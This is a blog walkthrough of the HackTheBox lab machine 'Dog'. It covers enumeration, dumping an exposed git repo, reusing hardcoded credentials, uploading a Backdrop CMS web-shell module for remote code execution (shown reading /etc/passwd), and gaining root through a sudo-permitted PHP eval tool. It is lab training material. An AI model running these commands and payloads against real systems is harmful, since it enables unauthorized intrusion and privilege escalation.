Hackthebox: Dog

Saurabh ShindeSaurabh Shinde
6 min read

Introduction

Hello everyone, how are you doing? Today we are doing “Dog” from hackthebox, which is an easy box for beginners.

The box begins with a web app that has its git directory exposed. By downloading the source from the git folder, we discover that the website uses Backdrop CMS. The downloaded source code also includes a hardcoded username and password for a user who is the admin of the site.

Once we log in as the user, we upload a malicious module that, when accessed, allows remote code execution. This provides a shell on the box as the user "johncusack".

Privilege escalation is piece of cake. User can execute a binary with sudo privileges that has flag to run php code inline , which gives us root on the box.

With that being said let’s just jump in..

Attacking with NMAP

After connecting to the box through OpenVPN, we get the IP of the “dog”.

We start attacking the box using nmap with the following command

nmap -sC -sV -oA nmap/dog -vv 10.10.11.58

Where,

-sC to run default scripts when a port is open.

-sV enumerates the versions of services running on ports.

-oA output all the formats and put in nmap directory.

-vv for verbose

Following is the scan result

# Nmap 7.94SVN scan initiated Fri Mar 14 17:32:22 2025 as: nmap -sC -sV -oA nmap/dog -vv 10.10.11.58                                                                                                                                          
Nmap scan report for 10.10.11.58                                                                                                                                                                                                              
Host is up, received reset ttl 63 (0.33s latency).                                                                                                                                                                                            
Scanned at 2025-03-14 17:32:36 UTC for 21s                                                                                                                                                                                                    
Not shown: 974 closed tcp ports (reset)                                                                                                                                                                                                       
PORT      STATE    SERVICE         REASON         VERSION                                                                                                                                                                                     
22/tcp    open     ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)                                                                                                                               
| ssh-hostkey:                                                                                                                                                                                                                                
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)                                                                                                                                                                                
| ssh-rsa ....                                                                                                                                                                
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)                                                                                                                                                                               
| ecdsa-sha2-nistp256 .....                                                                            
|   256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)                                                                                                                                                                             
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc                                                                                                                                                            
80/tcp    open     http            syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))                                                                                                                                                              
| http-methods:                                                                                                                                                                                                                               
|_  Supported Methods: GET HEAD POST OPTIONS                                                                                                                                                                                                  
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510                                                                                                                                                                         
| http-git:                                                                                                                                                                                                                                   
|   10.10.11.58:80/.git/     <----------   exposed git repo                                                                                                                                                                                                              
|     Git repository found!                                                                                                                                                                                                                   
|     Repository description: Unnamed repository; edit this file 'description' to name the...                                                                                                                                                 
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...                                                                                                                                                    
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)                                                                                                                                                                                    
| http-robots.txt: 22 disallowed entries <----------- 
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply 
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password  
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog

nmap scan says there are two ports open

PortServiceRemark
22SSHFollowing SSH banner tells it is an ubuntu server. OpenSSH 8.2p1 Ubuntu 4ubuntu0.12
80HTTPReveals that .git repository is exposed by web server.

Downloading source from exposed git repo

As nmap scan shows, there is git repository exposed by the web-server, let’s get the source code.

We are going to use tool called git-dumper

git-dumper http://10.10.11.58/.git src/
💡
git-dumper can be installed on system using command pip3 install git-dumper. (Creating virtual environment is recommended)

Looking at the source tree generated

$tree -L 1 src/
src/
├── LICENSE.txt
├── README.md
├── core
├── files
├── index.php
├── layouts
├── robots.txt
├── settings.php
├── sites
└── themes

Backdrop CMS

After accessing the website, home page discloses CMS system used for website as “Backdrop CMS”

Also, quick grep on downloaded source code ( from previous section ) using term “BACKDROP_VERSION” reports “Backdrop CMS” version “1.27.1

$grep BACKDROP_VERSION -r .                                                                                                                              
./core/includes/bootstrap.inc:define('BACKDROP_VERSION', '1.27.1');

Google on term “Backdrop CMS 1.27.1 exploit” gives this exploit-db page link

The exploit title clearly mentions "Authenticated" remote code execution, meaning we need to be logged in to the site, which we aren't. Let's find out how to get the login details for the website.

Hunting for credentials

When we have source code of website, we generally hunt for three things

  • version (which we just did in above point)

  • database credentials

  • username / emails / virtual host disclosed.

Hunting for database credentials

To find database credentials, we can search the source code for key terms like "password," "database," "mysql," "postgres," "mongodb," etc. Luckily, we found something useful with one of these terms.

$grep -E 'mysql://' -r .

./settings.php:$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop
Database userDatabase password
rootBackDropJ2024DS2024

Hunting for emails / virtual hosts

To find these, I generally use this search pattern for hackthebox.

grep -rE '<machine-name>.htb' <directory-name>

So in our case,

$grep -E 'dog.htb' -r .
--[snip]--
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"

So, by browsing through the source code, we got potential user of site “tiffany”.

Login to site as tiffany

We login to site using following credentials.

User emailPassword
tiffany@dog.htbBackDropJ2024DS2024

Exploiting Backdrop CMS

Step-1: Creating malicious zip to upload using exploit script

Now that we are “authenticated” as tiffany, (also cherry on top, tiffany happens to be admin of the site).

we can use the exploit we discussed in “Backdrop CMS” section.

Download and save the exploit.

Execute the exploit as follows,

$python3 exploit.py http://10.10.11.58

Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php

Step-2: Upload zip, but wait can we upload zip ?

Okay,

Now go to /admin/modules/install. A careful observer will adjust the URL since the previous path isn't valid. In our case, the URL is

http://10.10.11.58/?q=admin/modules/install

But after uploading the respective file we get following error message.

“The specified file shell.zip could not be uploaded. Only files with the following extensions are allowed: tar tgz gz bz2”

This means that zip files are not allowed to upload.

Step-3: Repack zip content to tar gz and upload tar to get RCE

To repack shell.zip as shell.tar.gz, use following commands,

# create
$unzip shell.zip && tar -cvf shell.tar.gz shell/ && rm -rf shell/
Archive:  shell.zip
 extracting: shell/shell.info        
 extracting: shell/shell.php         
shell/
shell/shell.info
shell/shell.php

# confirm
$tar --list -f shell.tar.gz 
shell/
shell/shell.info
shell/shell.php

Upload the shell.tar.gz instead of shell.zip (refer Step-2).

Then we can confirm the RCE using following command,

curl --silent --path-as-is http://10.10.11.58/modules/shell/shell.php?cmd=cat+/etc/passwd | grep sh$
$curl --silent --path-as-is http://10.10.11.58/modules/shell/shell.php?cmd=cat+/etc/passwd | grep sh$

root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash

Shell as johncusack

Using the RCE above, we discover a user named “johncusack” on the box.

Using “credentials” reuse from section “login to the site as tiffany”, we can SSH into the box as “johncusack”

SSH usernameSSH password
johncusackBackDropJ2024DS2024
$ssh johncusack@10.10.11.58                                                                                               
johncusack@10.10.11.58's password: *****                                                                                            
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)
--[snip]--
johncusack@dog:~$ id
uid=1001(johncusack) gid=1001(johncusack) groups=1001(johncusack)

johncusack@dog:~$ ls
user.txt

johncusack@dog:~$ cat user.txt
c33***************************

PrivEsc

After we have shell on box as “johncusack” , we can query what command user can execute with sudo privileges as follows.

johncusack@dog:~$ sudo -l
[sudo] password for johncusack: BackDrop******

Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee                         <-------------

Playing with binary and finding out how it works using,

sudo /usr/local/bin/bee --help

There is an interesting option or flag in the binary that stands out.

eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

The binary utility allows us to execute inline PHP code, and it also has sudo privileges. Nice!

Using following command, we can pop the root shell on the box.

sudo /usr/local/bin/bee --root=/var/www/html ev 'system("/bin/bash")'
johncusack@dog:~$ sudo /usr/local/bin/bee --root=/var/www/html ev 'system("/bin/bash")'
root@dog:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)

root@dog:/var/www/html# cat /root/root.txt 
7f******************************
0
Subscribe to my newsletter

Read articles from Saurabh Shinde directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Saurabh Shinde
Saurabh Shinde